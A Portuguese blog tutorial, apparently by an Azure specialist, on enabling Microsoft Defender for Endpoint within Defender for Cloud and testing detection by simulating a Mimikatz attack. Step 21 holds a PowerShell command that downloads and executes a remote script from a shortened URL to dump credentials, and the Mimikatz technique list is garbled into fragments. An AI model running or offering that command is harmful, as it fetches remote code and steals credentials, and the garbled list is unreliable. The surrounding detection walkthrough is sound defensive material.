O Microsoft Defender for Endpoint é uma solução holística, entregue à nuvem e de segurança de ponto final. Suas principais características são:
- Risk-based vulnerability management and assessment
- Attack surface reduction
- Behavioral based and cloud-powered protection
- Endpoint detection and response (EDR)
- Automatic investigation and remediation
- Managed hunting services
A integração do Defender for Cloud com o Microsoft Defender for Endpoint está ativada por padrão. Assim, quando você habilita recursos de segurança aprimorados, você dá consentimento para que o Microsoft Defender for servers acessem o Microsoft Defender for Endpoint dados relacionados a vulnerabilidades, software instalado e alertas para seus pontos finais.
Disponibilidade
| Aspecto | Detalhes |
|---|---|
| Estado de liberação: | Disponibilidade geral (GA) |
| Precificação: | Requer o Microsoft Defender para servidores |
| Ambientes suportados: |  Computadores habilitados para Azure Arc executando Windows/LinuxVMs do Azure executando Linux (versões com suporte) VMs do Azure executando o Windows Server 2022, 2019, 2016, 2012 R2, 2008 R2 SP1, WVD (Área de Trabalho Virtual do Windows), Windows 10 Enterprise de várias sessões (anteriormente EVD (Enterprise para Áreas de Trabalho Virtuais) VMs do Azure executando o Windows 10 (diferente de EVD ou WVD) |
| Funções e permissões necessárias: | * Para ativar/desativar a integração: Administrador de segurança ou Proprietário * Para exibir os alertas do Defender for Endpoint no Defender for Cloud: Leitor de segurança, Leitor, Contribuinte do Grupo de Recursos, Proprietário de Grupo de Recursos, Administrador de Segurança, Proprietário de Assinatura ou Colaborador de Assinatura |
| Nuvem: | Nuvens comerciaisAzure Governamental Azure China 21Vianet Contas da AWS conectadas |
Benefícios da integração do Microsoft Defender para endpoint com o Defender for Cloud
O Microsoft Defender for Endpoint protege suas máquinas Windows e Linux, sejam elas hospedadas no Azure, nuvens híbridas (no local) ou AWS. As proteções incluem:
- Advanced post-breach detection sensors. Defender para os sensores da Endpoint coletar uma vasta gama de sinais comportamentais de suas máquinas.
- Vulnerability assessment from the Microsoft threat and vulnerability management solution. Com o Microsoft Defender for Endpoint ativado, o Defender for Cloud pode mostrar vulnerabilidades descobertas pelo módulo de gerenciamento de ameaças e vulnerabilidades e também oferecer este módulo como uma solução de avaliação de vulnerabilidade suportada.
Este módulo também traz os recursos de inventário de software descritos no Access um inventário de software e pode ser ativado automaticamente para máquinas suportadas com as configurações de implantação automática.
- Analytics-based, cloud-powered, post-breach detection. Defender for Endpoint rapidamente se adapta às ameaças em mudança. Ele usa análises avançadas e big data. É amplificado pelo poder do Intelligent Security Graph com sinais no Windows, Azure e Office para detectar ameaças desconhecidas. Ele fornece alertas acionáveis e permite que você responda rapidamente.
- Threat intelligence. O Defender for Endpoint gera alertas quando identifica ferramentas, técnicas e procedimentos do atacante. Ele usa dados gerados por caçadores de ameaças da Microsoft e equipes de segurança, aumentados pela inteligência fornecida pelos parceiros.
Ao integrar o Defender for Endpoint com o Defender for Cloud, você se beneficiará dos seguintes recursos extras:
- Automated onboarding. O Defender for Cloud habilita automaticamente o sensor Defender for Endpoint em todas as máquinas suportadas conectadas ao Defender for Cloud.
- Single pane of glass. As páginas do portal Defender for Cloud exibem alertas do Defender para Endpoint. Para investigar mais, use o Microsoft Defender para as páginas do próprio portal do Endpoint, onde você verá informações adicionais, como a árvore do processo de alerta e o gráfico de incidentes. Você também pode ver uma linha do tempo detalhada da máquina que mostra cada comportamento por um período histórico de até seis meses.
Quais são os requisitos para o microsoft defender for Endpoint tenant?
Quando você usa o Defender for Cloud para monitorar suas máquinas, Defender for Endpoint tenant é criado automaticamente.
- Location: Os dados coletados pelo Defender for Endpoint são armazenados na geolocalização do tenant conforme identificado durante o provisionamento. Os dados dos clientes em forma pseudônimo também podem ser armazenados nos sistemas centrais de armazenamento e processamento nos Estados Unidos. Depois de configurar a localização, você não pode alterá-la. Se você tiver sua própria licença para o Defender for Endpoint e precisar mover seus dados para outro local, entre em contato com o suporte da Microsoft para redefinir o tenant.
- Moving subscriptions: Se você mudou sua assinatura do Azure entre os tenants do Azure, algumas etapas preparatórias manuais são necessárias antes que o Defender for Cloud implante o Defender for endpoint. Para obter detalhes completos, entre em contato com o suporte da Microsoft.
Passo a Passo
Habilitar o Microsoft Defender for Cloud
Para utilizar o Microsoft Defender for Endpoint é necessário que o Microsoft Defender for Cloud está configurado, já escrevi um artigo aqui no site mostrando como habilitar o Microsoft Defender for Cloud.
Como habilitar o Microsoft Defender for Cloud – Jádson Alves (jadsonalves.com.br)
01 – Faça login no portal do Azure.
02 – No portal do Azure pesquise por Microsoft Defender for Cloud.
03 – Na tela Microsoft Defender for Cloud | Overview em Management clique em Environment settings.
04 – Na tela Microsoft Defender for Cloud | Environment settings selecione a assinatura que deseja.
05 – Na tela Settings | Defender plans certifique-se que o plano Enable all Microsoft Defender for Cloud plans e Microsoft Defender for Servers estejam habilitados.
Habilite o Microsoft Defender for Endpoint integration
Habilitar a integração para Windows
Pré-requisitos
Confirme se sua máquina atende aos requisitos necessários para o Defender for endpoint:
- Certifique-se de que a máquina está conectada ao Azure e à internet conforme necessário:
- Azure virtual machines (Windows or Linux) – Configure as configurações de rede descritas na configuração de configuração de proxy do dispositivo e configurações de conectividade à internet: Windows ou Linux.
- On-premises machines – Conecte suas máquinas-alvo ao Azure Arc, conforme explicado em máquinas híbridas Connect com servidores habilitados para arco Azure.
- Enable Microsoft Defender for servers. Veja Quickstart: Habilite o Defender para os recursos de segurança aprimorados da Nuvem.
3. Se você mudou sua assinatura entre os tenants do Azure, algumas etapas preparatórias manuais também são necessárias. Para obter detalhes completos, entre em contato com o suporte da Microsoft.
06 – No portal do Azure pesquise Microsoft Defender for Cloud.
07 – Na tela Microsoft Defender for Cloud | Overview em Management clique em Environment settings.
08 – Na tela Microsoft Defender for Cloud | Environment settings selecione a assinatura que deseja.
09 – Na tela Settings | Defender plans clique em Integrations.
10 – Na tela Settings | Integrations certifique que a opção Allow Microsoft Defender for Endpoint to access my data está habilitada.
Habilitar a integração para Linux
19 – Da próxima vez que você retornar a página do Microsoft Defender for Cloud em Settings Integrations, o botão Enable for Linux machines não será mostrado. Para desativar a integração para Linux, você precisará desabilitá-la para o Windows também, limpando a caixa de seleção para Allow Microsoft Defender for Endpoint to access my data.
20 – Como podemos observar a extensão MDE foi instalada nas máquinas virtuais Linux.
Simulando uma ameaça com Mimikatz
Mimikatz é um aplicativo de código aberto que permite aos usuários visualizar e salvar credenciais de autenticação, como tíquetes Kerberos . Benjamin Delpy continua liderando o desenvolvimento do Mimikatz, portanto, o kit de ferramentas funciona com a versão atual do Windows e inclui os ataques mais avançados.
Os invasores costumam usar o Mimikatz para roubar credenciais e elevar privilégios: na maioria dos casos, o software de proteção de endpoint e os sistemas antivírus detectam e removem. Por outro lado, os testadores de penetração usam Mimikatz para descobrir e testar vulnerabilidades em suas redes para que você possa corrigi-las.
Mimikatz demonstrou originalmente como explorar uma vulnerabilidade no sistema de autenticação do Windows. Agora, esta ferramenta cobre vários tipos diferentes de vulnerabilidades. Mimikatz pode realizar os seguintes métodos de coleta de credenciais:
- Pass-the-Hash : Anteriormente, o Windows armazenava credenciais de autenticação em um hash NTLM . Os invasores usam o Mimikatz para passar a string hash exata para o computador de destino para login. Os invasores nem precisam quebrar a senha, eles só precisam interceptar o hash e usá-lo sem nenhum processamento. É o mesmo que encontrar a chave de todas as portas da casa no chão. Você precisa de uma chave para abrir qualquer porta.
- Pass-the-Ticket ( ): Windows , (Ticket). Mimikatz Kerberos . , .
- Over-Pass the Hash (Pass the Key): pass-the-hash, , .
- Kerberos Golden Ticket): (pass-the-ticket), KRBTGT. .« » .
- Kerberos Silver Ticket: pass-the-ticket, « » Windows, . Kerberos (TGS), . Microsoft (TGS) , .
- Pass-the-Cache): , Windows! , Mac/UNIX/Linux.
21 – No Windows Server abra o Command Prompt e execute o seguinte comando.
powershell “IEX (new-Object Net.Webclient).DownloadString(‘http://is.gd/oeoFuI’); Invoke-Mimikatz -DumpCreds”
Após executar o comando o Windows Security vai detectar como uma ameaça e fará o bloqueio.
22 – Abra o Windows Security clique em Virtus & threat protection em Current threats, clique em Threat history, na tela Threat history clique em See full history, percebam que temos o Trojan:PowerShell/Mimikats.
23 – No portal do Azure pesquise por Microsoft Defender for Cloud, na tela Microsoft Defender for Cloud | Overview clique em Security alerts.
24 – Na tela Microsoft Defender for Cloud | Security alerts temos todos os alertas de segurança do ambiente, percebam que temos os alertas Mimikatz credential theft tool e Suspicious use of PowerShell detected com gravidade alta para a máquina virtual “VM-Teste-EDR-Win”.
25 – Na tela do Microsoft Defender for Cloud clique em Inventory.
31 – Abaixo temos Related entities onde podemos observar as informações, Account, File, File hash, Host e Malware.
32 – Ainda na tela do alerta Mimikatz credential theft tool clique em Take action.
33 – Em Take action temos as opções Mitigate the threat onde temos algumas etapas sugeridas pelo Microsoft Defender for Cloud para mitigar a ameaça, também temos a opção Prevent furure attacks com recomendações para prevenir ataques futuros. Com a opção Trigger automated responde podemos configurar uma resposta automática utilizando o logic app, e também podemos suprimir os alertas semelhantes como a opção Supress similiar alerts.
34 – Também podemos descartar o alerta, que basicamente esconde o alerta do painel de alertas de segurança, em Active e selecionando Dismissed.
Comente suas sugestões e observações!
Forte abraço, obrigado e até o próximo post.
Carreira desenvolvida na área de tecnologia da informação, com ampla experiência em Cloud
Computing e Cloud Security.
Forte atuação em projetos de Cloud Security no Microsoft Azure e com tecnologias de
segurança do Microsoft 365.
Tenho Experiência em Microsoft Azure, Microsoft 365, AWS e Windows Server.
Sou Microsoft MVP na categoria Microsoft Azure, AWS Communit Builder Security & Identity e
MCT.